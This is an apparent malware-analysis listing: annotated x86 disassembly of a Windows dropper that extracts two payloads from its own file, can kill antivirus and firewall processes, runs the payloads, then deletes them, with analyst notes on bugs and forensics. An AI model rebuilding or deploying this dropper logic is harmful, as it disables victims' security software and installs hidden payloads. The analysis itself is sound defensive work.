; Byte-for-byte the same algorithm as sub_401488, but the name test is
; sub_401405 (firewall list).  Called from WinMain when bit 5 of the
; trailer flag word is set.  All five defects noted on sub_401488 apply
; here unchanged: uninitialised pe.dwSize, snapshot failure tested against
; 0 instead of -1, the first entry "terminated" through the snapshot handle
; (0x4015C8-0x4015D7 is the real path, 0x40158E-0x401591 is the broken one),
; OpenProcess with SYNCHRONIZE (0x100000) only, and ignored return values.
; Frame layout is identical to sub_401488.
; ---------------------------------------------------------------------------
.text:00401540 sub_401540 proc near ; CODE XREF: WinMain(x,x,x,x)+11Cp
.text:00401540
.text:00401540 pe = byte ptr -12Ch
.text:00401540 hSnapshot = dword ptr -4
.text:00401540
.text:00401540 push ebp
.text:00401541 mov ebp, esp
.text:00401543 sub esp, 12Ch
.text:00401549 push ebx
.text:0040154A push 0 ; th32ProcessID
.text:0040154C push 2 ; dwFlags (TH32CS_SNAPPROCESS)
.text:0040154E call CreateToolhelp32Snapshot
.text:00401553 mov ebx, eax
.text:00401555 test ebx, ebx ; BUG: failure value is -1, not 0
.text:00401557 mov [ebp+hSnapshot], ebx
.text:0040155A jz loc_4015F5
; BUG: pe.dwSize is not initialised before this call.
.text:00401560 lea eax, [ebp+pe]
.text:00401566 push eax ; lppe
.text:00401567 push ebx ; hSnapshot
.text:00401568 call Process32First
.text:0040156D test eax, eax
.text:0040156F jz loc_4015F5
.text:00401575 push esi
.text:00401576 lea eax, [ebp-108h] ; pe.szExeFile
.text:0040157C push edi
.text:0040157D push eax ; char *
.text:0040157E call sub_401405
.text:00401583 mov esi, ds:TerminateProcess
.text:00401589 pop ecx
.text:0040158A test eax, eax
.text:0040158C jz short loc_401593
; BUG: ebx is the snapshot handle, not a process handle (same as sub_401488).
.text:0040158E push 0 ; uExitCode
.text:00401590 push ebx ; hProcess
.text:00401591 call esi ; TerminateProcess
.text:00401593
.text:00401593 loc_401593: ; CODE XREF: sub_401540+4Cj
.text:00401593 lea eax, [ebp+pe]
.text:00401599 push eax ; lppe
.text:0040159A push ebx ; hSnapshot
.text:0040159B call Process32Next
.text:004015A0 mov edi, ds:CloseHandle
.text:004015A6 test eax, eax
.text:004015A8 jz short loc_4015F0
.text:004015AA
.text:004015AA loc_4015AA: ; CODE XREF: sub_401540+AEj
.text:004015AA lea eax, [ebp-108h] ; pe.szExeFile
.text:004015B0 push eax ; char *
.text:004015B1 call sub_401405
.text:004015B6 test eax, eax
.text:004015B8 pop ecx
.text:004015B9 jz short loc_4015DC
.text:004015BB push dword ptr [ebp-124h] ; dwProcessId (pe.th32ProcessID)
.text:004015C1 push 1 ; bInheritHandle
.text:004015C3 push 100000h ; dwDesiredAccess = SYNCHRONIZE only (no PROCESS_TERMINATE)
.text:004015C8 call ds:OpenProcess
.text:004015CE mov ebx, eax
.text:004015D0 test ebx, ebx
.text:004015D2 jz short loc_4015DC
.text:004015D4 push 0 ; uExitCode
.text:004015D6 push ebx ; hProcess
.text:004015D7 call esi ; TerminateProcess (result ignored)
.text:004015D9 push ebx ; hObject
.text:004015DA call edi ; CloseHandle
.text:004015DC
.text:004015DC loc_4015DC: ; CODE XREF: sub_401540+79j
.text:004015DC ; sub_401540+92j
.text:004015DC mov ebx, [ebp+hSnapshot] ; restore snapshot handle
.text:004015DF lea eax, [ebp+pe]
.text:004015E5 push eax ; lppe
.text:004015E6 push ebx ; hSnapshot
.text:004015E7 call Process32Next
.text:004015EC test eax, eax
.text:004015EE jnz short loc_4015AA
.text:004015F0
.text:004015F0 loc_4015F0: ; CODE XREF: sub_401540+68j
.text:004015F0 push ebx ; hObject (snapshot)
.text:004015F1 call edi ; CloseHandle
.text:004015F3 pop edi
.text:004015F4 pop esi
.text:004015F5
.text:004015F5 loc_4015F5: ; CODE XREF: sub_401540+1Aj
.text:004015F5 ; sub_401540+2Fj
.text:004015F5 pop ebx
.text:004015F6 leave
.text:004015F7 retn
.text:004015F7 sub_401540 endp
.text:004015F7
.text:004015F8
.text:004015F8 ; --------------- S U B R O U T I N E ---------------------------------------
.text:004015F8
; ---------------------------------------------------------------------------
; int __cdecl sub_4015F8(DWORD flags, DWORD bit)   -- bit test
;
; Returns 1 if bit `bit` of `flags` is set, else 0:
;   eax = 1 << (bit & 31); eax &= flags;
;   neg eax          -> CF = (eax != 0)
;   sbb eax, eax     -> eax = CF ? -1 : 0
;   neg eax          -> eax = CF ?  1 : 0
; WinMain calls it with the trailer flag dword and bits 0..5; the bit
; meanings are documented at each WinMain call site.
; Clobbers: eax, ecx, flags.
; ---------------------------------------------------------------------------
.text:004015F8 sub_4015F8 proc near ; CODE XREF: WinMain(x,x,x,x)+FBp
.text:004015F8 ; WinMain(x,x,x,x)+111p ...
.text:004015F8
.text:004015F8 arg_0 = dword ptr 4
.text:004015F8 arg_4 = dword ptr 8
.text:004015F8
.text:004015F8 mov ecx, [esp+arg_4] ; bit index
.text:004015FC push 1
.text:004015FE pop eax
.text:004015FF shl eax, cl ; mask = 1 << bit
.text:00401601 and eax, [esp+arg_0] ; mask & flags
.text:00401605 neg eax ; CF = nonzero
.text:00401607 sbb eax, eax ; -1 or 0
.text:00401609 neg eax ; 1 or 0
.text:0040160B retn
.text:0040160B sub_4015F8 endp
.text:0040160B
.text:0040160C
.text:0040160C ; --------------- S U B R O U T I N E ---------------------------------------
.text:0040160C
.text:0040160C ; Attributes: bp-based frame
.text:0040160C
; ---------------------------------------------------------------------------
; int __stdcall WinMain(hInstance, hPrevInstance, lpCmdLine, nShowCmd)
;
; Dropper logic, driven entirely by a 0x18-byte trailer at the end of its
; own image (read at EOF-0x18 into [ebp+var_20]):
;   +0x00  dword  len1      size of payload 1 (var_20)
;   +0x04  dword  len2      size of payload 2 (var_1C)
;   +0x08  dword  flags     bit-tested via sub_4015F8 (var_18)
;   +0x0C  word   dirsel    1 = %TEMP%, 2 = system dir, 3 = Windows dir,
;                           anything else = current directory (var_14)
;   +0x0E  5 bytes          suffix appended to drop name 1 (var_12)
;   +0x13  5 bytes          suffix appended to drop name 2 (var_D)
; File layout implied by the two fseek()s: [ ... payload1 | payload2 | trailer ].
;
; Flag bits (from the sub_4015F8 call sites below):
;   bit 0  run drop 1 via ShellExecuteA      bit 3  delete both drops after 5 s
;   bit 1  run drop 2 via ShellExecuteA      bit 4  kill AV processes (sub_401488)
;   bit 2  "decrypt" (see below)             bit 5  kill firewall processes (sub_401540)
;
; Drop names: <dir><tmpnam()><suffix>, e.g. via wsprintfA("%s%s%s").  The
; two paths are FileName and var_32C.  "Decryption" is `fputc(fgetc(in) - k)`
; where k = bit 2 of flags, i.e. every byte is decremented by 1 or copied
; as-is; anyone recovering the payloads from the sample only needs to add 1
; to each byte when bit 2 is set.
;
; Review notes / defects:
;   * fopen(own image, "rb") return value is never checked; a NULL FILE*
;     goes straight into fseek/fread.  Same for the two fopen(..,"wb").
;   * fgetc() EOF (-1) is not handled: `movsx eax, al` turns it into 0xFF,
;     so a trailer claiming more bytes than the file has simply pads the
;     drops with 0xFF/0xFE bytes instead of failing.
;   * The 5-byte suffix fields are passed to %s without being forced to be
;     NUL-terminated; a trailer without the NUL lets %s read past the field.
;   * Directory (up to 0x104 bytes) + tmpnam + suffix are formatted into
;     0x104-byte stack buffers with no length check; long paths overflow
;     into the neighbouring buffer.  Input is self-controlled, so this is a
;     robustness defect rather than an exploitable one.
;   * The cleanup (bit 3) is Sleep(5000) then DeleteFileA; if the launched
;     drop is still running the delete fails silently and the file stays
;     in the chosen directory - useful for forensics.
;   * The hModule argument slot ([ebp+8]) is reused to hold the per-byte key
;     after the real hModule has been consumed by GetModuleFileNameA.
; ---------------------------------------------------------------------------
.text:0040160C ; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
.text:0040160C _WinMain@16 proc near ; CODE XREF: start+12Fp
.text:0040160C
.text:0040160C Filename = byte ptr -534h
.text:0040160C var_430 = byte ptr -430h
.text:0040160C var_32C = byte ptr -32Ch
.text:0040160C FileName = byte ptr -228h
.text:0040160C Buffer = byte ptr -124h
.text:0040160C var_20 = dword ptr -20h
.text:0040160C var_1C = dword ptr -1Ch
.text:0040160C var_18 = dword ptr -18h
.text:0040160C var_14 = word ptr -14h
.text:0040160C var_12 = dword ptr -12h
.text:0040160C var_D = dword ptr -0Dh
.text:0040160C var_8 = dword ptr -8
.text:0040160C var_4 = dword ptr -4
.text:0040160C hModule = dword ptr 8
.text:0040160C hPrevInstance = dword ptr 0Ch
.text:0040160C lpCmdLine = dword ptr 10h
.text:0040160C nShowCmd = dword ptr 14h
.text:0040160C
.text:0040160C push ebp
.text:0040160D mov ebp, esp
.text:0040160F sub esp, 534h
.text:00401615 push esi
.text:00401616 mov esi, 104h ; esi = MAX_PATH, reused as every buffer size below
.text:0040161B push edi
; --- 1. locate and open our own image --------------------------------------
.text:0040161C lea eax, [ebp+Filename]
.text:00401622 push esi ; nSize
.text:00401623 push eax ; lpFilename
.text:00401624 push [ebp+hModule] ; hModule
.text:00401627 call ds:GetModuleFileNameA ; GetModuleFileName(hModule,lpFilename,nSize) -
.text:00401627 ; EXE Filename
.text:00401627 ;
.text:0040162D lea eax, [ebp+Filename]
.text:00401633 push offset aRb ; "rb"
.text:00401638 push eax ; char *
.text:00401639 call fopen
.text:0040163E mov edi, eax ; edi=fopen(lpFilename,"rb") -
.text:0040163E ; EXE
.text:0040163E ; edi
.text:0040163E ;
; BUG: edi (FILE*) is not checked for NULL before fseek/fread below.
; --- 2. read the 0x18-byte trailer ------------------------------------------
.text:00401640 push 2 ; int (SEEK_END)
.text:00401642 push 0FFFFFFE8h ; __int32 (-0x18)
.text:00401644 push edi ; FILE *
.text:00401645 call fseek ; fseek(edi,-18h,SEEK_END) -
.text:00401645 ; 18h- EXE
.text:00401645 ;
.text:0040164A push edi ; FILE *
.text:0040164B push 1 ; size_t
.text:0040164D lea eax, [ebp+var_20]
.text:00401650 push 18h ; size_t
.text:00401652 push eax ; void *
.text:00401653 call fread ; fread(var_20,18h,1,edi) -
.text:00401653 ; 18h EXE
.text:00401653 ; var_20
; --- 3. choose the drop directory from the trailer's selector word ----------
.text:00401658 movsx eax, [ebp+var_14] ; dirsel
.text:0040165C add esp, 24h
.text:0040165F dec eax
.text:00401660 jz short loc_401698 ; 1 -> GetTempPathA
.text:00401662 dec eax
.text:00401663 jz short loc_401688 ; 2 -> GetSystemDirectoryA
.text:00401665 dec eax
.text:00401666 jz short loc_401678 ; 3 -> GetWindowsDirectoryA
.text:00401668 lea eax, [ebp+Buffer] ;
.text:00401668 ;
.text:0040166E push eax ; lpBuffer
.text:0040166F push esi ; nBufferLength
.text:00401670 call ds:GetCurrentDirectoryA ; default -> current directory
.text:00401676 jmp short loc_4016A6 ; buffer =
.text:00401676 ;
.text:00401678 ; ---------------------------------------------------------------------------
.text:00401678
.text:00401678 loc_401678: ; CODE XREF: WinMain(x,x,x,x)+5Aj
.text:00401678 lea eax, [ebp+Buffer]
.text:0040167E push esi ; uSize
.text:0040167F push eax ; lpBuffer
.text:00401680 call ds:GetWindowsDirectoryA
.text:00401686 jmp short loc_4016A6 ; buffer = Windows
.text:00401686 ;
.text:00401688 ; ---------------------------------------------------------------------------
.text:00401688
.text:00401688 loc_401688: ; CODE XREF: WinMain(x,x,x,x)+57j
.text:00401688 lea eax, [ebp+Buffer]
.text:0040168E push esi ; uSize
.text:0040168F push eax ; lpBuffer
.text:00401690 call ds:GetSystemDirectoryA
.text:00401696 jmp short loc_4016A6 ; buffer =
.text:00401696 ;
.text:00401698 ; ---------------------------------------------------------------------------
.text:00401698
.text:00401698 loc_401698: ; CODE XREF: WinMain(x,x,x,x)+54j
.text:00401698 lea eax, [ebp+Buffer]
.text:0040169E push eax ; lpBuffer
.text:0040169F push esi ; nBufferLength
.text:004016A0 call ds:GetTempPathA ; buffer =
.text:004016A6
.text:004016A6 loc_4016A6: ; CODE XREF: WinMain(x,x,x,x)+6Aj
.text:004016A6 ; WinMain(x,x,x,x)+7Aj ...
; None of the four directory calls has its return value checked.
; --- 4. build the two drop-file paths: <dir><tmpnam><suffix> ---------------
.text:004016A6 lea eax, [ebp+var_430]
.text:004016AC push ebx
.text:004016AD push eax ; char *
.text:004016AE call tmpnam ; "" var_430
.text:004016AE ;
.text:004016B3 lea eax, [ebp+var_12] ; suffix 1 (5-byte trailer field, NUL not enforced)
.text:004016B6 mov esi, ds:wsprintfA
.text:004016BC push eax
.text:004016BD lea eax, [ebp+var_430]
.text:004016C3 push eax
.text:004016C4 lea eax, [ebp+Buffer]
.text:004016CA push eax
.text:004016CB mov ebx, offset aSSS ; "%s%s%s"
.text:004016D0 lea eax, [ebp+FileName]
.text:004016D6 push ebx ; LPCSTR
.text:004016D7 push eax ; LPSTR
.text:004016D8 call esi ; wsprintfA ; wsprintf(Filename,"%s%s%s",Buffer,var_430,var_12)
.text:004016D8 ; Filename=Buffer+var_430+var_12
.text:004016DA lea eax, [ebp+var_430]
.text:004016E0 push eax ; char *
.text:004016E1 call tmpnam ; "" var_430
.text:004016E1 ;
.text:004016E6 lea eax, [ebp+var_D] ; suffix 2 (5-byte trailer field, NUL not enforced)
.text:004016E9 push eax
.text:004016EA lea eax, [ebp+var_430]
.text:004016F0 push eax
.text:004016F1 lea eax, [ebp+Buffer]
.text:004016F7 push eax
.text:004016F8 lea eax, [ebp+var_32C]
.text:004016FE push ebx ; LPCSTR
.text:004016FF push eax ; LPSTR
.text:00401700 call esi ; wsprintfA ; var_32C=Buffer+var430+var_D
.text:00401700 ;
; --- 5. optional process killing, gated by flag bits 4 and 5 ---------------
.text:00401702 push 4 ; bit 4
.text:00401704 push [ebp+var_18] ; flags
.text:00401707 call sub_4015F8 ; ??
.text:0040170C add esp, 38h
.text:0040170F test eax, eax
.text:00401711 jz short loc_401718
.text:00401713 call sub_401488 ; KillProcess1 (AV list)
.text:00401718
.text:00401718 loc_401718: ; CODE XREF: WinMain(x,x,x,x)+105j
.text:00401718 push 5 ; bit 5
.text:0040171A push [ebp+var_18] ; flags
.text:0040171D call sub_4015F8 ; ??
.text:00401722 pop ecx
.text:00401723 test eax, eax
.text:00401725 pop ecx
.text:00401726 jz short loc_40172D
.text:00401728 call sub_401540 ; KillProcess2 (firewall list)
.text:0040172D
.text:0040172D loc_40172D: ; CODE XREF: WinMain(x,x,x,x)+11Aj
; --- 6. open both output files (return values unchecked) -------------------
.text:0040172D mov esi, offset aWb ; "wb"
.text:00401732 lea eax, [ebp+FileName]
.text:00401738 push esi ; char *
.text:00401739 push eax ; char *
.text:0040173A call fopen
.text:0040173F mov [ebp+var_8], eax ; var_8=fopen(Filename,"wb"); -
.text:0040173F ;
.text:0040173F ;
.text:00401742 lea eax, [ebp+var_32C]
.text:00401748 push esi ; char *
.text:00401749 push eax ; char *
.text:0040174A call fopen
.text:0040174F push 2 ; bit 2 -> per-byte key
.text:00401751 mov [ebp+var_4], eax ; var_4=fopen(var_32C,"wb")
.text:00401751 ;
.text:00401751 ;
.text:00401754 push [ebp+var_18] ; flags
.text:00401757 xor ebx, ebx ; ebx = 0 (reused as NULL args and as "bit 0" below)
.text:00401759 xor esi, esi ; byte counter
.text:0040175B call sub_4015F8 ; ??
; --- 7. copy/"decrypt" payload 1: starts at EOF - 0x18 - len2 - len1 --------
.text:00401760 push 2 ; int (SEEK_END)
.text:00401762 push 0FFFFFFE8h
.text:00401764 mov [ebp+hModule], eax ; key = bit 2 of flags (0 or 1), stored in the hModule slot
.text:00401767 pop eax ; eax = -0x18
.text:00401768 sub eax, [ebp+var_1C] ; - len2
.text:0040176B sub eax, [ebp+var_20] ; - len1
.text:0040176E push eax ; __int32
.text:0040176F push edi ; FILE *
.text:00401770 call fseek
.text:00401775 add esp, 24h
.text:00401778
.text:00401778 loc_401778: ; CODE XREF: WinMain(x,x,x,x)+188j
.text:00401778 push edi ; Decrypt1
.text:00401779 call fgetc ; EOF not checked: -1 becomes 0xFF below
.text:0040177E push [ebp+var_8] ; FILE *
.text:00401781 movsx eax, al
.text:00401784 sub eax, [ebp+hModule] ; out = in - key
.text:00401787 push eax ; int
.text:00401788 call fputc
.text:0040178D add esp, 0Ch
.text:00401790 inc esi
.text:00401791 cmp esi, [ebp+var_20] ; len1 (signed compare)
.text:00401794 jl short loc_401778
; --- 8. copy/"decrypt" payload 2: starts at EOF - 0x18 - len2 ---------------
.text:00401796 push 2 ; int (SEEK_END)
.text:00401798 push 0FFFFFFE8h
.text:0040179A pop eax
.text:0040179B sub eax, [ebp+var_1C] ; -0x18 - len2
.text:0040179E push eax ; __int32
.text:0040179F push edi ; FILE *
.text:004017A0 call fseek
.text:004017A5 add esp, 0Ch
.text:004017A8 xor esi, esi
.text:004017AA
.text:004017AA loc_4017AA: ; CODE XREF: WinMain(x,x,x,x)+1BAj
.text:004017AA push edi ; Decrypt2
.text:004017AB call fgetc
.text:004017B0 push [ebp+var_4] ; FILE *
.text:004017B3 movsx eax, al
.text:004017B6 sub eax, [ebp+hModule] ; out = in - key
.text:004017B9 push eax ; int
.text:004017BA call fputc
.text:004017BF add esp, 0Ch
.text:004017C2 inc esi
.text:004017C3 cmp esi, [ebp+var_1C] ; len2 (signed compare)
.text:004017C6 jl short loc_4017AA
.text:004017C8 push [ebp+var_8] ; FILE *
.text:004017CB call fclose
.text:004017D0 push [ebp+var_4] ; FILE *
.text:004017D3 call fclose
.text:004017D8 push edi ; FILE *
.text:004017D9 call fclose
; --- 9. launch drops (flag bits 0 and 1) -----------------------------------
.text:004017DE push ebx ; bit 0
.text:004017DF push [ebp+var_18] ; flags
.text:004017E2 call sub_4015F8
.text:004017E7 mov esi, ds:ShellExecuteA ; Opens or prints a specified file
.text:004017ED add esp, 14h
.text:004017F0 test eax, eax
.text:004017F2 jz short loc_401803
.text:004017F4 push 0Ah ; nShowCmd (SW_SHOWDEFAULT)
.text:004017F6 push ebx ; lpDirectory (NULL)
.text:004017F7 lea eax, [ebp+FileName]
.text:004017FD push ebx ; lpParameters (NULL)
.text:004017FE push eax ; lpFile
.text:004017FF push ebx ; lpOperation (NULL -> default verb)
.text:00401800 push ebx ; hwnd
.text:00401801 call esi ; ShellExecuteA ; FileName
.text:00401803
.text:00401803 loc_401803: ; CODE XREF: WinMain(x,x,x,x)+1E6j
.text:00401803 push 1 ; bit 1
.text:00401805 push [ebp+var_18] ; flags
.text:00401808 call sub_4015F8
.text:0040180D pop ecx
.text:0040180E test eax, eax
.text:00401810 pop ecx
.text:00401811 jz short loc_401822
.text:00401813 push 0Ah ; nShowCmd (SW_SHOWDEFAULT)
.text:00401815 push ebx ; lpDirectory (NULL)
.text:00401816 lea eax, [ebp+var_32C]
.text:0040181C push ebx ; lpParameters (NULL)
.text:0040181D push eax ; lpFile
.text:0040181E push ebx ; lpOperation (NULL -> default verb)
.text:0040181F push ebx ; hwnd
.text:00401820 call esi ; ShellExecuteA ; var_32C
.text:00401822
.text:00401822 loc_401822: ; CODE XREF: WinMain(x,x,x,x)+205j
; --- 10. wait 5 s, then delete both drops if flag bit 3 is set -------------
.text:00401822 push 1388h ; dwMilliseconds (5000)
.text:00401827 call ds:Sleep
.text:0040182D push 3 ; bit 3
.text:0040182F push [ebp+var_18] ; flags
.text:00401832 call sub_4015F8
.text:00401837 mov esi, ds:DeleteFileA
.text:0040183D pop ecx
.text:0040183E pop ecx
.text:0040183F pop ebx
.text:00401840 test eax, eax
.text:00401842 jz short loc_40184D
.text:00401844 lea eax, [ebp+FileName]
.text:0040184A push eax ; lpFileName
.text:0040184B call esi ; DeleteFileA ; FileName (fails silently if the drop is still running)
.text:0040184D
.text:0040184D loc_40184D: ; CODE XREF: WinMain(x,x,x,x)+236j
.text:0040184D push 3 ; bit 3 (same bit, second file)
.text:0040184F push [ebp+var_18] ; flags
.text:00401852 call sub_4015F8
.text:00401857 pop ecx
.text:00401858 test eax, eax
.text:0040185A pop ecx
.text:0040185B jz short loc_401866
.text:0040185D lea eax, [ebp+var_32C]
.text:00401863 push eax ; lpFileName
.text:00401864 call esi ; DeleteFileA ; var_32C
.text:00401866
.text:00401866 loc_401866: ; CODE XREF: WinMain(x,x,x,x)+24Fj
.text:00401866 pop edi
.text:00401867 xor eax, eax ; always returns 0
.text:00401869 pop esi
.text:0040186A leave
.text:0040186B retn 10h
.text:0040186B _WinMain@16 endp
.text:0040186B
.text:0040186E ; [00000006 BYTES: COLLAPSED FUNCTION
Process32Next. PRESS KEYPAD "+" TO EXPAND]
.text:00401874 ; [00000006 BYTES: COLLAPSED FUNCTION Process32First. PRESS KEYPAD "+" TO EXPAND]
.text:0040187A ; [00000006 BYTES: COLLAPSED FUNCTION CreateToolhelp32Snapshot. PRESS KEYPAD "+" TO EXPAND]
.text:00401880 ; [00000006 BYTES: COLLAPSED FUNCTION strstr. PRESS KEYPAD "+" TO EXPAND]
.text:00401886 ; [00000006 BYTES: COLLAPSED FUNCTION fclose. PRESS KEYPAD "+" TO EXPAND]
.text:0040188C ; [00000006 BYTES: COLLAPSED FUNCTION fputc. PRESS KEYPAD "+" TO EXPAND]
.text:00401892 ; [00000006 BYTES: COLLAPSED FUNCTION fgetc. PRESS KEYPAD "+" TO EXPAND]
.text:00401898 ; [00000006 BYTES: COLLAPSED FUNCTION tmpnam. PRESS KEYPAD "+" TO EXPAND]
.text:0040189E ; [00000006 BYTES: COLLAPSED FUNCTION fread. PRESS KEYPAD "+" TO EXPAND]
.text:004018A4 ; [00000006 BYTES: COLLAPSED FUNCTION fseek. PRESS KEYPAD "+" TO EXPAND]
.text:004018AA ; [00000006 BYTES: COLLAPSED FUNCTION fopen. PRESS KEYPAD "+" TO EXPAND]
.text:004018B0
.text:004018B0 ; --------------- S U B R O U T I N E ---------------------------------------
.text:004018B0
.text:004018B0 ; Attributes: library function bp-based frame
.text:004018B0
; start -- MSVC CRT entry point for a GUI executable (WinMainCRTStartup-style).
; What the code below does, in order: install an SEH frame around the whole
; function, run the CRT init calls (__set_app_type, __p__fmode, __p__commode,
; _adjust_fdiv, __setusermatherr [skipped here], __setdefaultprecision,
; _initterm x2, __getmainargs), derive lpCmdLine from _acmdln and nShowCmd from
; GetStartupInfoA, then call _WinMain@16 and pass its result to exit().
; Register roles: ebx = 0 for the whole function (used as NULL / zero byte),
; esi = cursor into the raw command line, eax = scratch.
; Frame slots (see the stack variables below): var_74 = command-line cursor
; copy, var_70 = argv, var_6C = _startupinfo passed to __getmainargs,
; var_68 = WinMain return value, var_64 = envp, var_60 = argc,
; var_18 = esp saved for the SEH unwind, var_4 = SEH try-level.
.text:004018B0                 public start
.text:004018B0 start           proc near
.text:004018B0
.text:004018B0 var_74          = dword ptr -74h
.text:004018B0 var_70          = dword ptr -70h
.text:004018B0 var_6C          = dword ptr -6Ch
.text:004018B0 var_68          = dword ptr -68h
.text:004018B0 var_64          = dword ptr -64h
.text:004018B0 var_60          = dword ptr -60h
.text:004018B0 StartupInfo     = _STARTUPINFOA ptr -5Ch
.text:004018B0 var_18          = dword ptr -18h
.text:004018B0 var_4           = dword ptr -4
.text:004018B0
.text:004018B0                 push    ebp
.text:004018B1                 mov     ebp, esp
.text:004018B3                 push    0FFFFFFFFh              ; initial SEH try-level (-1 = outside any __try)
.text:004018B5                 push    offset dword_4010A8     ; presumably the _except_handler3 scope table -- confirm
.text:004018BA                 push    offset loc_401A30       ; handler thunk (jmp ds:_except_handler3)
.text:004018BF                 mov     eax, large fs:0
.text:004018C5                 push    eax                     ; previous registration record
.text:004018C6                 mov     large fs:0, esp         ; link this record at the head of the SEH chain
.text:004018CD                 sub     esp, 68h
.text:004018D0                 push    ebx
.text:004018D1                 push    esi
.text:004018D2                 push    edi
.text:004018D3                 mov     [ebp+var_18], esp       ; saved esp; the __except body at 401A02 reloads it
.text:004018D6                 xor     ebx, ebx                ; ebx = 0 from here on
.text:004018D8                 mov     [ebp+var_4], ebx        ; try-level 0: now inside the __try block
.text:004018DB                 push    2                       ; 2 = _GUI_APP
.text:004018DD                 call    ds:__set_app_type
.text:004018E3                 pop     ecx                     ; cdecl: discard the one argument
.text:004018E4                 or      dword_4022A0, 0FFFFFFFFh ; two CRT globals preset to -1 (their role is not recoverable from this listing)
.text:004018EB                 or      dword_4022A4, 0FFFFFFFFh
.text:004018F2                 call    ds:__p__fmode
.text:004018F8                 mov     ecx, dword_40229C
.text:004018FE                 mov     [eax], ecx              ; *__p__fmode() = dword_40229C (0 in .data)
.text:00401900                 call    ds:__p__commode
.text:00401906                 mov     ecx, dword_402298
.text:0040190C                 mov     [eax], ecx              ; *__p__commode() = dword_402298 (0 in .data)
.text:0040190E                 mov     eax, ds:_adjust_fdiv
.text:00401913                 mov     eax, [eax]
.text:00401915                 mov     dword_4022A8, eax       ; local copy of msvcrt's _adjust_fdiv flag
.text:0040191A                 call    nullsub_1               ; 1-byte stub: plain retn
.text:0040191F                 cmp     dword_40228C, ebx       ; dword_40228C is initialised to 1 in .data ...
.text:00401925                 jnz     short loc_401933        ; ... so the __setusermatherr call below is skipped
.text:00401927                 push    offset loc_401A2C       ; matherr stub that just returns 0
.text:0040192C                 call    ds:__setusermatherr
.text:00401932                 pop     ecx
.text:00401933
.text:00401933 loc_401933:                             ; CODE XREF: start+75j
.text:00401933                 call    __setdefaultprecision
.text:00401938                 push    offset unk_40200C       ; C initialiser table [unk_402008, unk_40200C)
.text:0040193D                 push    offset unk_402008       ; both bounds are zero dwords in .data: nothing to run
.text:00401942                 call    _initterm
.text:00401947                 mov     eax, dword_402294
.text:0040194C                 mov     [ebp+var_6C], eax       ; _startupinfo.newmode = dword_402294 (0 in .data)
.text:0040194F                 lea     eax, [ebp+var_6C]
.text:00401952                 push    eax                     ; &startinfo
.text:00401953                 push    dword_402290            ; dowildcard (0 in .data)
.text:00401959                 lea     eax, [ebp+var_64]
.text:0040195C                 push    eax                     ; &envp
.text:0040195D                 lea     eax, [ebp+var_70]
.text:00401960                 push    eax                     ; &argv
.text:00401961                 lea     eax, [ebp+var_60]
.text:00401964                 push    eax                     ; &argc
.text:00401965                 call    ds:__getmainargs
.text:0040196B                 push    offset unk_402004       ; second initialiser range [unk_402000, unk_402004), also empty
.text:00401970                 push    offset unk_402000
.text:00401975                 call    _initterm
.text:0040197A                 add     esp, 24h                ; pop the 2 + 5 + 2 cdecl arguments above
.text:0040197D                 mov     eax, ds:_acmdln
.text:00401982                 mov     esi, [eax]              ; esi = raw command line (program name included)
.text:00401984                 mov     [ebp+var_74], esi
.text:00401987                 cmp     byte ptr [esi], 22h     ; does it start with a double quote?
.text:0040198A                 jnz     short loc_4019C6        ; no: unquoted program name
.text:0040198C
.text:0040198C loc_40198C:                             ; CODE XREF: start+E8j
.text:0040198C                 inc     esi                     ; quoted: advance until the closing quote or NUL
.text:0040198D                 mov     [ebp+var_74], esi
.text:00401990                 mov     al, [esi]
.text:00401992                 cmp     al, bl                  ; NUL terminator?
.text:00401994                 jz      short loc_40199A
.text:00401996                 cmp     al, 22h
.text:00401998                 jnz     short loc_40198C
.text:0040199A
.text:0040199A loc_40199A:                             ; CODE XREF: start+E4j
.text:0040199A                 cmp     byte ptr [esi], 22h
.text:0040199D                 jnz     short loc_4019A3        ; stopped at NUL: nothing more to skip
.text:0040199F
.text:0040199F loc_40199F:                             ; CODE XREF: start+FBj
.text:0040199F                 inc     esi                     ; step over the closing quote / a blank
.text:004019A0                 mov     [ebp+var_74], esi
.text:004019A3
.text:004019A3 loc_4019A3:                             ; CODE XREF: start+EDj
.text:004019A3                                         ; start+119j
.text:004019A3                 mov     al, [esi]
.text:004019A5                 cmp     al, bl
.text:004019A7                 jz      short loc_4019AD        ; end of string
.text:004019A9                 cmp     al, 20h
.text:004019AB                 jbe     short loc_40199F        ; skip every byte <= ' ' (unsigned compare)
.text:004019AD
.text:004019AD loc_4019AD:                             ; CODE XREF: start+F7j
.text:004019AD                 mov     [ebp+StartupInfo.dwFlags], ebx ; esi now points at lpCmdLine
.text:004019B0                 lea     eax, [ebp+StartupInfo]
.text:004019B3                 push    eax                     ; lpStartupInfo
.text:004019B4                 call    ds:GetStartupInfoA
.text:004019BA                 test    byte ptr [ebp+StartupInfo.dwFlags], 1 ; STARTF_USESHOWWINDOW
.text:004019BE                 jz      short loc_4019D1
.text:004019C0                 movzx   eax, [ebp+StartupInfo.wShowWindow] ; parent supplied a show state
.text:004019C4                 jmp     short loc_4019D4
.text:004019C6 ; ---------------------------------------------------------------------------
.text:004019C6
.text:004019C6 loc_4019C6:                             ; CODE XREF: start+DAj
.text:004019C6                                         ; start+11Fj
.text:004019C6                 cmp     byte ptr [esi], 20h     ; unquoted name: advance to the first blank or NUL
.text:004019C9                 jbe     short loc_4019A3
.text:004019CB                 inc     esi
.text:004019CC                 mov     [ebp+var_74], esi
.text:004019CF                 jmp     short loc_4019C6
.text:004019D1 ; ---------------------------------------------------------------------------
.text:004019D1
.text:004019D1 loc_4019D1:                             ; CODE XREF: start+10Ej
.text:004019D1                 push    0Ah                     ; 10 = SW_SHOWDEFAULT when no show state was given
.text:004019D3                 pop     eax
.text:004019D4
.text:004019D4 loc_4019D4:                             ; CODE XREF: start+114j
.text:004019D4                 push    eax                     ; nShowCmd
.text:004019D5                 push    esi                     ; lpCmdLine
.text:004019D6                 push    ebx                     ; hPrevInstance
.text:004019D7                 push    ebx                     ; lpModuleName
.text:004019D8                 call    ds:GetModuleHandleA
.text:004019DE                 push    eax                     ; hInstance
.text:004019DF                 call    _WinMain@16             ; WinMain(x,x,x,x)
.text:004019E4                 mov     [ebp+var_68], eax       ; keep WinMain's result
.text:004019E7                 push    eax                     ; int
.text:004019E8                 call    ds:exit                 ; does not return; the SEH record is never unlinked here
.text:004019E8 start           endp
.text:004019E8
.text:004019EE ;
---------------------------------------------------------------------------
